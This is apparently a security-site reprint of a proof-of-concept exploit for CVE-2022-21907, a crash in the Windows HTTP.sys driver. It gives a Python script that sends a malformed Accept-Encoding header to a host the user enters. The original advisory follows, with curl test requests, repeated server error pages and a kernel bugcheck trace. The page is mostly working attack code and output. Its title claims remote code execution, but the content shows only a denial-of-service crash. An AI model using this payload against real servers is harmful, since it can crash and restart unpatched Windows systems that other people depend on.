Vulnerabilities

HTTP Protocol Stack Denial Of Service Remote Code Execution

#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time
< #!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host... ")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE +"Sending an especially malicious crafted packet, please
wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,
OOOAOAOOOAOOAOOOAOOOAOOOAOO,
****************************stupiD, *, ,',})
# Not necessary :)
print(poc," ")
print(Style.RESET_ALL)





---- Original Advisory ----

## Title: HTTP.sys buffer overflow denial of service
## Author: nu11secur1ty
## Date: 01.12.2022
## Vendor: https://docs.microsoft.com/
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0
## CVE-2022-21907

## Description:
NOTE: After a couple of hours of tests and experiments, there have
been no vulnerabilities when we decides to install the IIS packages on
these Windows platforms, it's ok, and everything is patched! Windows
Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by
default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol
Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service
and restart the system.
The attacker can be sending a maliciously crafted package to the
headers of the HTTP server of the system and this will be critical for
this system!
Not correctly sanitizing!
Status: CRITICAL

## Simple test connection before debugging

```cmd
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```
## 302

```cmd
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
```
- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## 404

```cmd
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had
its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
```

## Bugcheck:

```cmd
1: kd> kp
Child-SP RetAddr Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28
1: kd> !analyze
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception
that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the
exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

*** WARNING: Unable to verify timestamp for win32k.sys

BUGCHECK_CODE: 139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa10287993480

BUGCHECK_P3: ffffa102879933d8

BUGCHECK_P4: 0

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of
a stack-based buffer in this application. This overrun could
potentially allow a malicious user to gain control of this
application.

SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63

MODULE_NAME: HTTP

IMAGE_NAME: HTTP.sys

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList

FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd}

Followup: MachineOwner
---------
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)

## Proof and Exploit:
[href](https://streamable.com/fbojva)

Share your comment publicly